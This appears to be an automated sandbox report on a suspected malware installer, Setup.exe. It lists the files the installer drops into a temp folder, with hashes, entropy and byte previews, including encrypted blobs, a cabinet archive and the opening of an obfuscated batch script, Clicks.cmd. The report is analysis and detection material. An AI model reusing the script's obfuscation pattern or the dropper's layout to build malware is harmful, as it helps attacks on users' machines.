                                                                Preview:....3.8E....H%.......;...5....E.H...M.....E.M...........E...@.......H.3.3.@.u...M..E....E......U.E.3.3.@.u..#..E..#...u..]..E.M.#.#.....u...M.8].t..E..U.#.#....t....E...u...t5.i.....t.=....t.=....u..]...8]......8].t.8].u.8].t....M....."u.................t).M...!..;...]...w.;...S....].+].+].K.G....u..u......YYj......M................U..@r..........3..J.@3..t...M.E....E.....U..E.3.3.@.bt..#..E..#...u..]..E.M.#.#.....u...M.8].t..E.U.#.#....t....E...u...t5.B.....t.=....t.=....u..]...8]......8].t.8].u.8].t....M.....s.............M..%..;.r@w.;.v:.M.3..].......C8A....H%.......;.~.Q....~..M....s......]..M..n ..#.#.E...x..t..Y...PVWS.u........k...PVWS.u..[......_^[..]..U....3.S.].VW.}.8S....J........@w9.M..9.v..q...3..9.v..I...3.}..S......P.u.3...R...QP.!............E.w...uQ.......U.....}..D...E....}...U....U...t.....?......."...u..E.U.S.u..u.Q.u..3.u..e.....E.C.U..]..e..M.j@Y+.E..M....T......U.3..@r...M.E.E..U.3.D...}.#..$r...E..M....U.3

                                                                C:\Users\user\AppData\Local\Temp\Agrees

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                File Type:Microsoft Cabinet archive data, 489682 bytes, 12 files, at 0x2c +A "Cash" +A "Jury", ID 6845, number 1, 29 datablocks, 0x1 compression
                                                                Category:dropped
                                                                Size (bytes):489682
                                                                Entropy (8bit):7.998526384976645
                                                                Encrypted:true
                                                                SSDEEP:12288:wpgLBZWuuPSjx8pv6yufclVtaCbOhYtzYjX9cbgeZ0X:cgkPSV8pyHWEytUjNcbgtX
                                                                MD5:3B891BAB1F59CA7A8F70A02506C5BE5E
                                                                SHA1:4FE8FD4136129A410F8A97B0415D7BCA29EF77E9
                                                                SHA-256:E95567B78827D3B731C7BD183741E044EE91A81FB58907CD5257B0F4668C0660
                                                                SHA-512:0831DCED5A288153166C4A0314B7B24C408336DE9BF741BCCB711D1A71996951DD395E5B91EB3FDB1423C3CA94DB28EEAE3DD486FDCEF40983E4231DAB3B06B5
                                                                Malicious:false
                                                                Preview:MSCF.....x......,...................;........H.........Y.. .Cash..8...H.....Y.. .Jury............Y.. .Adaptor.V-...L.....Y.. .Fw..T..Vy.....Y.. .Shaved.....V......Y.. .Served....._......Y.. .Newbie....._......Y.. .Developers..L.._|.....Y.. .Tragedy....._......Y.. .Cookies....._......Y.. .Toys....._......Y.. .Sail..^g>.T..CK.}.|T....l..g..."...X.hP.....p..... `.ny.^0..P.....#..[m..^.j.....P....(.A....x...........`.....wrf..y.g....C6..wD/.../..>......@.9US.>.....9jheg...n.&Q.[.....+tX.....6m.`.6...~e.O].NW...m.L..T..!E.4)b..g'.Y.QvL=<.#..(....\.Ye......qh.xa;;..?...PM M.i..JID...^|<".U.o...(.F v....Vj....n.....6~.........hc.[......j.".... ,..`z.c.f.#O{L<.^..Q.....6m...m...c.9..iK.}7m.wn.v..N..w8%...O1.";[..B{..*...Q..#Y...........#..vD.+.fv..{.dr...>$~:.#.x...#..Qv..W;....i...k.S....>......v.u?B....)g..A..u...\i..o#.z.S.Q.:...q.:..f.s....-:.&^....7o.~.M..az.P..#..=.....a.Ya._i(.. ........>7....f.F.E......g..O.c.4ad..Gfd....=2..D..<w..Qm..4H...&.(.

                                                                C:\Users\user\AppData\Local\Temp\Avon

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                File Type:OpenPGP Public Key
                                                                Category:dropped
                                                                Size (bytes):62464
                                                                Entropy (8bit):7.997103321874569
                                                                Encrypted:true
                                                                SSDEEP:1536:A0cvC95Od7r1Muwg//k0reABy6Bz8ejwS8s:A0z95OdPkg//kIrBy6B8eP8s
                                                                MD5:CE133FEEA90EBC7648B2A1826CDF76A2
                                                                SHA1:31BD289BDB6F118507B41B8E69AAECF4A1163773
                                                                SHA-256:E1819706091BFBF96DBB9BC5DB4F66CFD0A56BEF7F0B6438531C3D9C4ADC3119
                                                                SHA-512:E4BF39FBAD9A5902D2F024E35B8ABDD4CC6714ACE244A594BEE41465436FB2B8B22C1FAF7375BE7DC986BEA22AC4A77B78652EF7D4F633B0DB98B6E3D521BF92
                                                                Malicious:false
                                                                Preview:..m....a%..L....]...2.w.d4....^.b3...Q../'Ww....3..%@....;.......>.R..o.~%.....S..[...z.(..z...............h.Y.Qi..4..<".\#.-.@.0..n.>.:..@D....*.a..?}..Q...:..eY...':.3..nXq4..<.._...O.....XcI5~.Vg..f..ia.V.........L.......^..`....`.......p?.zE.tt.......l.)..E...:._=;.-.V.^.....R{....r....g.bUCBX.Yn..s...W......."^...'....H.-..[4..Y..U{.W...e..Y...0...3v=.v....q~.N....e\......@K....2..?.a.L..h..0tpT1...@M....U=....4.0?......DJ.O..rW..^..A...i...?...WPH.M...!....:A..|=.vJ.%..~i..o.jg.....UN..C ..k..A.P....d.h{...u6..M.?...+.i.F.k.e0+.u.........B.Bt..x=.......#......,.~l.b..(Z#..L..<....l..d.7..4.z....vsQ1\SK..!.^.A..4......+A.F..BJ1.a..[.4..K.6L..\S/..$J=.L.(:.cu..=R.w.6..)50S.^c.-.3C.J.oLd...TF..b.k..,.8F5x'..O.yMP.."k.....J..V.A72cpJ.P....!)<.x..B.....#.}..|x|...b.c..b......&LB.1x...3..8....]...$&I.h..H..]{...V..N..o..V..do.=%5e:.`........f@..@.=.-....S.XL>!N%.P.@.a$........w.z.Z..}0@...|..O.....V.....t.z.....q.....8.Q....

                                                                C:\Users\user\AppData\Local\Temp\Cash

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):149504
                                                                Entropy (8bit):6.695940442997366
                                                                Encrypted:false
                                                                SSDEEP:3072:/lHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESb:NHS3zcNPj0nEo3tb2j6AUkB0CThp6b
                                                                MD5:AED1C869CC9610344E24FBD8050AC4D4
                                                                SHA1:A23CE35D2CB399F75B091959A4E449F655EBE142
                                                                SHA-256:91906E3A443DF990F4FA6693887DB5017A03E7487997B2CC95EE21757E8E9CB1
                                                                SHA-512:7F2721FAC7B773C9BC51DAAB0D2209E4E53C04DC42A4058D214A78E03572E7CBB3700A6D01CEFF20859CDE06252454F1F8729B7940F5314204029E182E472237
                                                                Malicious:false
                                                                Preview:.............@.....>.t...........Q.s...C..............E..F........N.....s....3.RP.W......V..F.........C....t....t....AK......V...t......R...v..6RP........V..[....C......M....t..J.j..U.../...m...../...R..^......!....+........@.......;.t...............Q.r...F.............:...........g.......{E..$..zE.......wZ.$..{E..C.....IM....t..J.j..U..h....m.........R.T^...........+........@.......;.t.......................G..p........v.....{........S...BP.......V.E...P....;.t.P....I...M..H......................R.......`....R..X........G..p...l....v..d....O..q.........Q.H...w.........6q..P.Kn.....D......T..........[..........G..p.......v........P....E....P..;...........;E......................;...C........K....t#.J.j..U...,...m.....U..........x...R.\...U.......+.U..`......@..U..S....;.t....U..D......U..:...H...wr.$.0{E..F..........+K....t(.J.j..U..J,...m....E...................R.&\........................@......>.t................G..p....

                                                                C:\Users\user\AppData\Local\Temp\Clearing

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):86016
                                                                Entropy (8bit):7.997914543444093
                                                                Encrypted:true
                                                                SSDEEP:1536:grfjVQJTaqw1U6D6ZJoYliEvfstVc5/88wb0320DNStFeRBkj:Gj+Lw1X6ZqY/vfstVu/Ipe2
                                                                MD5:2A80ED063A2EC6F7FBDBAA0C8806BEE5
                                                                SHA1:7235E6A68488D9583FFB7BFEFD146FD4B47E074E
                                                                SHA-256:EF6F02A7FBA84C6FD4C7F3AA77141B4EBE36D7A0B89AA89B82E3689D3C4342D7
                                                                SHA-512:F3D245B534ACC86C0F13CF8C8A88AAA45CCD72EB959A9B710690F3F851327DF10A1F4045618886F10D8014BDF4B7E03EA5788A3F29EA237A35BDCE49AEE1F862
                                                                Malicious:false
                                                                Preview:..7..Y..........h.|.K.....:.......Mo..O.U..ru..........I$..@.).......cMc)C....r..K.....^...\......Hh...f<...pr.{Q.~...ym..l......L^x.M. ..P..A.........V...._...e.B.<F..........N......omiq ..[........q. .B.U=m...?...paB..qi?f....[......wn...Z..db...5....gy..>@...c+.v..o.(......m*......>.....0\....A..(&...2.?.1....n...Pp...O.C.n*...7.<...Y).....rn.S...]|.(n.F.U.0<.).q.h.8.a....w.".v......D..`..|.(8_..S5.U..........-.Z...L.f.Ns.......?......].p..B.p.>}AWDR.Exw....T......3...Y<.T....K......d.?.......`<sI4...gi..PN.?2&...H.._fh..H....o.H..4>.$.<.Zjw.."\..%..I..H.N....s<j.....Fp..e.#Vj....&..m,.}.?....xr.H.........`.i.1Jj..8..~.I..?u)1..&..k.% .I.=..x...V..! ......ULf.W....db#v.m../ldz-..:...L....0......E.P.}f..........p...}.L..z.?B4{Rz.d...V...0..=..<..TH..>...F.Q}.........q....~:..N..l.t...Q..,..e..I|}..."]iP..{.W...84...o.........P.G`...y...;t....T.L(K..*...@.(..H\....`..Ga.6{1K..h.qT]F".*.....o....>...D.}...mUi4={....\..|....Pn'.

                                                                C:\Users\user\AppData\Local\Temp\Clicks

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                File Type:ASCII text, with very long lines (980), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):21933
                                                                Entropy (8bit):5.098733008811691
                                                                Encrypted:false
                                                                SSDEEP:384:hXaKFDtP0hMjSwgunj4RBQtvcy7KxRVIjGBnV2gR9XnNNCUZ0n+RL1ddXJtNiLYi:hXaUchMGKnyBQVBujIG9AgJjFHb+
                                                                MD5:B72A397CD97E0F26EA645687E0E27B12
                                                                SHA1:8BA44F76D5CDD59429FAE20D9386E1F62785AFBA
                                                                SHA-256:5D3E41E290DC98B449E186D0A3E9EC9E02863DE087EC95B3684C399C7D4DB280
                                                                SHA-512:938FD796A5F4109B2678CE8B7AB93330317A71AA1E69CF81DE1C759A659D8B0E080B94BFA2F9FEA24224E19DDC53C3C1BB3F7CCD9ED8C5323638BD29E1EDC074
                                                                Malicious:false
                                                                Preview:Set Accessed=a..jDSDDaughters-Sc-Equipped-Stewart-..rXRestoration-Counties-Secured-Lucia-..iFTeddy-..lESuccessfully-Jordan-Justin-Clouds-..xYwSt-Moscow-Ou-..TdDiversity-Bookstore-Aid-Reasoning-Broadway-Consequences-Commissioners-..Set Momentum=2..XItBike-Subsidiaries-..KgcXAccessory-Scored-Message-Nuke-Guess-Figure-Necessarily-..NLlMight-Untitled-Mail-Programs-Charles-Tea-Myself-..rZActually-..DUeKYouth-Ieee-..vrAaInternationally-Temporal-Enjoy-Tiny-..kndFExpiration-Broadcasting-..xQSAcre-Recordings-Maternity-Switched-Soldiers-Injuries-Meets-..Set Doing=Z..wWCome-Strip-To-Clay-Rank-Mood-Licking-Dress-..jwQRequires-Genius-Studying-..ZZMATax-Solely-James-Putting-Hear-Irrigation-Strain-Collectible-..jDZones-Verizon-Costa-Valuable-Midlands-Calculations-..YDTechnical-Prophet-Involve-Recovered-Surveillance-Euro-Pix-..wlFears-Weekly-Barbados-..qoevCoin-Screensavers-Detailed-..NvHZSurveys-Keith-Louis-Disturbed-..Set Customize=I..FqFpCeremony-Brands-Conservative-Municipal-Ace-..tDUDuties-Papua-

                                                                C:\Users\user\AppData\Local\Temp\Clicks.cmd (copy)

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                File Type:ASCII text, with very long lines (980), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):21933
                                                                Entropy (8bit):5.098733008811691
                                                                Encrypted:false
                                                                SSDEEP:384:hXaKFDtP0hMjSwgunj4RBQtvcy7KxRVIjGBnV2gR9XnNNCUZ0n+RL1ddXJtNiLYi:hXaUchMGKnyBQVBujIG9AgJjFHb+
                                                                MD5:B72A397CD97E0F26EA645687E0E27B12
                                                                SHA1:8BA44F76D5CDD59429FAE20D9386E1F62785AFBA
                                                                SHA-256:5D3E41E290DC98B449E186D0A3E9EC9E02863DE087EC95B3684C399C7D4DB280
                                                                SHA-512:938FD796A5F4109B2678CE8B7AB93330317A71AA1E69CF81DE1C759A659D8B0E080B94BFA2F9FEA24224E19DDC53C3C1BB3F7CCD9ED8C5323638BD29E1EDC074
                                                                Malicious:false
                                                                Preview:Set Accessed=a..jDSDDaughters-Sc-Equipped-Stewart-..rXRestoration-Counties-Secured-Lucia-..iFTeddy-..lESuccessfully-Jordan-Justin-Clouds-..xYwSt-Moscow-Ou-..TdDiversity-Bookstore-Aid-Reasoning-Broadway-Consequences-Commissioners-..Set Momentum=2..XItBike-Subsidiaries-..KgcXAccessory-Scored-Message-Nuke-Guess-Figure-Necessarily-..NLlMight-Untitled-Mail-Programs-Charles-Tea-Myself-..rZActually-..DUeKYouth-Ieee-..vrAaInternationally-Temporal-Enjoy-Tiny-..kndFExpiration-Broadcasting-..xQSAcre-Recordings-Maternity-Switched-Soldiers-Injuries-Meets-..Set Doing=Z..wWCome-Strip-To-Clay-Rank-Mood-Licking-Dress-..jwQRequires-Genius-Studying-..ZZMATax-Solely-James-Putting-Hear-Irrigation-Strain-Collectible-..jDZones-Verizon-Costa-Valuable-Midlands-Calculations-..YDTechnical-Prophet-Involve-Recovered-Surveillance-Euro-Pix-..wlFears-Weekly-Barbados-..qoevCoin-Screensavers-Detailed-..NvHZSurveys-Keith-Louis-Disturbed-..Set Customize=I..FqFpCeremony-Brands-Conservative-Municipal-Ace-..tDUDuties-Papua-

                                                                C:\Users\user\AppData\Local\Temp\Cookies

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):115712
                                                                Entropy (8bit):6.395119066715225
                                                                Encrypted:false
                                                                SSDEEP:3072:0kjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgh:0kjGgQaE/loUDtf0accB30
                                                                MD5:C4852541FFA550317E284995D601BE19
                                                                SHA1:295EE4490A566D441DEAB2DBBB7917E36C154984
                                                                SHA-256:D31EEED38AC69015A7ACB915312B6FAEF3534641C61926F9CD4E5471C8921501
                                                                SHA-512:4EF2060810F8A9886CFCACAC246CBFC5408B46C3E07460B7D27271F52E09ABFFB1304A00B57C85F17F3C1B980E8944272CE2AD0B7902B23949C8D68CBE94B8EB
                                                                Malicious:false
                                                                Preview:.w..3.........+%E...@...@..$E...@..%E.@%E.[%E..%E..%E.p%E.....U...4SV...E.....W.u..E.......m......d.....h....E......E...'>...{,..{..}....>...C......;>........>...O......'?...K,.....&@.....C ....U...E....U.M..E..E...;E....?..;....?...E...O......@...M.......K .U..E......Q.........$K.......?........@.............sC...K.......G.....#K................A...C..E..G.......B....9E.|).K..E.A...M....BC...E.....HC.._^[..].....m.......B....l....uv..h...._0..t..O ......O......j8W.X........h...2...m.....d...........w....$.<.@..K..B....]....8....].....A..P....t........*E...@..)E...@...@.>*E...@._.@.....U...TS.]..E.VWj.P.E..E.....P...E.....S.u..E......E..............D...M.U..U....ua..up2..E..E..E....~E............S..}....f.x.....G...8....G...D..G..@...f.....B....}..u _^[..]....A....w..$.0.@...t....3..E...I.3..E......M.u.f...tz..$..........x.;...X...j........K........f.N.f.K.f.N.f..?......f.....tE..f.. ..yE.......M.E.4..E..M.u.A.M.P....f.x..u..<.;...PE..j..v.....O.......f.N.f.O.f.

                                                                C:\Users\user\AppData\Local\Temp\Developers

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):119808
                                                                Entropy (8bit):4.703941535706935
                                                                Encrypted:false
                                                                SSDEEP:768:8x/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3B:8dKaj6iTcPAsAhxjgarB/5el3B
                                                                MD5:6AD6CD8E77D34C3079924FD65546554F
                                                                SHA1:2E18F066D291DAF1FC92E65FCDA539082C96706B
                                                                SHA-256:C4DE2122AAC5865C856E71D4ECD8C2D96A9CDD0D1C277AC4585193F7A836CF86
                                                                SHA-512:A5E22E29C4B84F3E79CEB2B572E45266EC5CBCE440CEDE118508447B1B1EB74394BB90A1C8C8D27B587B1440CFBDB2F9319B375C63B90615450E282C13EA5F3F
                                                                Malicious:false
                                                                Preview:=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.r.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.r.>.>.>.?.?.?.?.?.?.?.?.?.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.r.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.A.A.A.A.A.A.A.A.A.A.r.r.r.r.r.r.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.r.r.r.r.r.r.r.r.r.r.r.C.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.

                                                                C:\Users\user\AppData\Local\Temp\Digital

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):84992
                                                                Entropy (8bit):7.998038120662092
                                                                Encrypted:true
                                                                SSDEEP:1536:sIA4cY4ZTD4Wdyt1SLu68D95GjAPjKocYPsj+R+VUBZfyzusHLyJ83wC8niH:/Zt4Okyt0YDrjJBPsaQaYLzt8niH
                                                                MD5:20939DE37758844D50817F401E778A6E
                                                                SHA1:57B1ADB6D7EFE4656D336C370B9A6836AD240047
                                                                SHA-256:3767D43C25C3E65CC5181C73875F1506A68AC2CBE4F0332E0C471C4A3842FF2B
                                                                SHA-512:9B3DB71D43B7C77C24C6AB59D205B18C9DA57105A9825F77C2865CE2F4A0EA92C1837B27A5D4AD6315BA92BA0FF995FA2BEB2ACDD4CD0A9B85C68EE362405F4D
                                                                Malicious:false
                                                                Preview:n..$.,.V_x...1d.........4.t.,.b.<.....F.3"...Q@.5.d......$..5.|...+..g....(..(.].7K..{)].Y'@..p..,E[..:"\T..L...u9.....X5..t....@..F......._.A]=GZ...F!.....Rc\.c.o.h.........<x.b_S=.e5..+EZ#....m...'S.d.......K.8Q..W..;..........",.....z..w....p..$0..C.....RHu.T..L....~.a..dZ.dW.>}....5....]m\G.....k%n.=.k....;W[E....h}Z.<..,....H.?"~iD.O...?.<_m.N~..=o. '......H<.vv...e.|=E.....'i?a....e.I.t...pg.Q3.......4.....^6^h\.`.v........9......Tf..=K..iR..'.I$]N.....p.Y...;R...C^..r).@..ai:~..9JP.......F.c3..|.R%......Wo.Z....N.Y..:...L..X6@........N9...#..n.B.X....Y.....~.S... ..45.TL...?..."..n'..v.5.......T.*..Sl....._4..r,.C.....8..>4...m.......{...C.....i...8.Pi+8.A.\gQ:..'I.....B*.q....oL_r{....|....F7f.`.i&u.9......^zL..Y..)..9..>..P..Z01.............%.....J.{.Q..[.~R..xyK.({.m;..[.Dv..wE.;....3.<..5..+...qkN..p?...e...F.x..42^%$......R7W...>B.....S.z>..JL..p=-B.e.v..Ph.v.2zG....jb.5m.T..Os.....>q...........#..m....Q..T.c.+....2..c...q....>..8.}^

                                                                C:\Users\user\AppData\Local\Temp\Flat

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):81920
                                                                Entropy (8bit):7.9975318296902085
                                                                Encrypted:true
                                                                SSDEEP:1536:KQJudkxXNhePo/DCiyl7QMkDKLdS5omcsuXq5oPj2TtfGXQ1Yn:TJIklbePIDVI76KLdS5oJr2T9WQ1M
                                                                MD5:4AB70FFED39BD5AC69154E19D58B0267
                                                                SHA1:4222C1A9BA794033A285027DB648950B3ED5BB42
                                                                SHA-256:37BAA43A816D6A60D68ABD4DEEDF84C6F3EE08FFC0BE271C9865A0CA1FF3977D
                                                                SHA-512:2C596F996C103900F3ABAC713241E61CCB45EC0FDD3342805A8400BC3992EE60A38BB660B6E67DABF57BC2F335DCA6E0D02B333EC2852406780B6FADE1FAF61B
                                                                Malicious:false
                                                                Preview:.dK.. .lV(..&...`e.?..)H...tX..-1`.d._E.W...fS..g<..w.%.`m.$..a_v..B.4.Tt.#....g?...Iy......)....).Sg ........t.g.q\....h)....D......./wF).{...F....d.^`..B..N...E.wj,.z0.s..aW..|..P-).3V...:..mC.....7.z$Pn......]......>...\...`.....N...+IS...Q........9+g .J...[...sp,.'.{1.....DnW..3.xS......H.z...z...L*..^.P..E.$.6:.....]I..}:i.........wl..(q....^.7..T.7..Ta...Va......g|..........zu#?.N`.O....anX..".e.....+....j.DyJ-F.a...?.m.....v.d......e...@Yu..Y...9....,.a....U...g......:.^.....\c..M...}....SP.n..A4'6hE.r.;9.>Y......5?..];i...\.6.....U......1....s.$..&../k..@e/..f.....l.,.x.[@<.H[..e.i%.O...Y&.mC...5$T]....p.h/6tfk.p...7.B[.[.......t..j.w...Rt{:&MTs..=t...-..YQ+S.(......:.!....z..C..1.@.p..@.sX.......A...../. ..n......Y.\..c..<..^.5.....K...[..?.D>.V...u....f.../..%......iq...W-,z......:.1.U...K..ro..5^..e..C..x..:.[8.U..$.....L....f.e.....<O?..rq.....4^..$......P....8.}.T.Z)...*2.u.,..J...S.1<....*u..{vp..qw.7.`]...c..h.'..

                                                                C:\Users\user\AppData\Local\Temp\Fw

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):11606
                                                                Entropy (8bit):7.4586390538525755
                                                                Encrypted:false
                                                                SSDEEP:192:/sxvhLuBgfMvSVZPkZeCeAH6N8VEVFJ84kcGNq4/C+Q3ISVSWMZMQ3rw:/GhLdXVaeCVrVEVFJ8ZcGwGBk7/UMQ38
                                                                MD5:7A4CC8156B3C6C90F7D85BCD734AFE1F
                                                                SHA1:60D593ADB9C1CC411A5AFC2B16479B75677162E9
                                                                SHA-256:2D6B7033E50813D756FFDD4AD36C8DF1017A9A70FC09483E8973B7929BE0DE8E
                                                                SHA-512:9F4A21993B88F883FA311B545BE8565939CD008045E764F4C2A44EF1883152BCE8C7F3EADCAB530650003C5693268D48D73FA48EF6B63B8CA90F5DE7C143DCDE
                                                                Malicious:false
                                                                Preview:8>@>H>P>X>`>h>p>x>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?.? ?(?0?8?@?H?P?X?........$3@3D3.3.3.3. .......0(0.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2.2.2.2.2.2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3.3.3.3.3.3 3$3(3,3034383@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.:.:.:.:.: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.;.;.;.;.; ;$;(;,;0;4;8;<;@;D;H;L;P;.<.<...@.......3.3.3.3.3.3.4.4.4,4<4@4P4T4X4`4x4.4.4.4.4.4.4.4.4.4.4.4.4.4.5 5$54585<5D5\5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.:.:.:.: :$:0:4:8:<:D:L:\:`:h:l:p:t:|:.:.:.:...`.......=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>.>.>.>.>.> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>.>.>.>.>.>.>.>.>.>.>.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?...p..x....0.0.0.0.0(0,0004080<0

                                                                C:\Users\user\AppData\Local\Temp\Gnome

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):56320
                                                                Entropy (8bit):7.996391191024259
                                                                Encrypted:true
                                                                SSDEEP:1536:9y+X35Zzw/OxuLxNqF9vtOEmH3fcoQZ/SDfNuz6RgBStp46V:9y+n5KGxuL89vcPZdDIW6BSjd
                                                                MD5:67EBFD624465856B781C2F15624B5FBB
                                                                SHA1:6B80BBBDBA9B6F3B587F6C84B81E509761C31C08
                                                                SHA-256:2EF775B484665CA2D846E398C6C65CDDFDD66E3AC0CF37B5D51780F7A913934B
                                                                SHA-512:0F392C2B778DB3F688BA0ADF2A37AA91470767A50D7E9A602600B602535B39B1FE02E865404A20363B1753BB55D5718582A69F759950B99A10F111A8795A930A
                                                                Malicious:false
                                                                Preview:..igIm...y(y........e...|...'...w.......9b.a....y.7.F...-.J.B....o...NVQ.xb._r#....wU...H>s...r......z......*.....wH...P{..=.o...q....={.....}....9sW<4hOJ.KK..1E.....@$.......%@....q........:X~...^......3<.i9...V....F....;.A[S'I+..... WW.I.R%8...p..yU..!....Uq...D.W.[G..v:...|.3...L.y^.H.v2....y..l..........m.^_...\N/....zy..{g?G...k.......H}f..q9R.I.^C.B....N.<..o.w.^wq\.j..../j...M..u.....9/.g?.R\e..Z..:.'.uI.].d..2.......&.M.. 0.O.{..........K.cT..o...].uz..=a.B@..C.}.T_.6..5+V.d..._.<.'.Ua...,d.......g[.....N.....XQ..O..8 ..6.Ce.4&....@)..3.]..*y.)X).....t...(<q#.w..X.`...wM.N.P.0{U.WnYu+..X....a.{[.....}...i.#PG..g........1..E..(.\`3_n.S2.eT&.........#.X......]`9/...YN.W.8.RH.K."..`..O.c....W@g..U.....!g.D.v?E.)..*.|.J.D..Y>.F.=..(.(".zo....R....<.C..f..E..v...R....`FG5"...x.(..$...[..%..a./.W...4z.?)z.\.TW&..@.[.w.W......94torJ..$....<.c.t.4.e?.v.n.&.....jt2..kr.`..Tn..H.....y......1..?.Y1.6.,T.z.l.D.C./.lC7...A9..e.x...m.Vg...@>jT....8r..

                                                                C:\Users\user\AppData\Local\Temp\Jury

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):79872
                                                                Entropy (8bit):6.667903538113778
                                                                Encrypted:false
                                                                SSDEEP:1536:SYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgB:1Wy4ZNoGmROL7F1G7hg
                                                                MD5:A7DD562FCE7652FB965799C55254A0BA
                                                                SHA1:CC4D96CC2BA4CE3BA53BAB6E9EAE0FCAD590C9C7
                                                                SHA-256:0C186D145F698364C95675C82600446E24DC25E2BD7DB0520733C67781EAC0B3
                                                                SHA-512:FC982815B5F73E5A145C0BD89C22E404A29C510D74714A66D0FF9C2AD1A516D426BD3FF2166A5C1336571827C4CC665311C591F227E2BB9E85FCB1E95F914785
                                                                Malicious:false
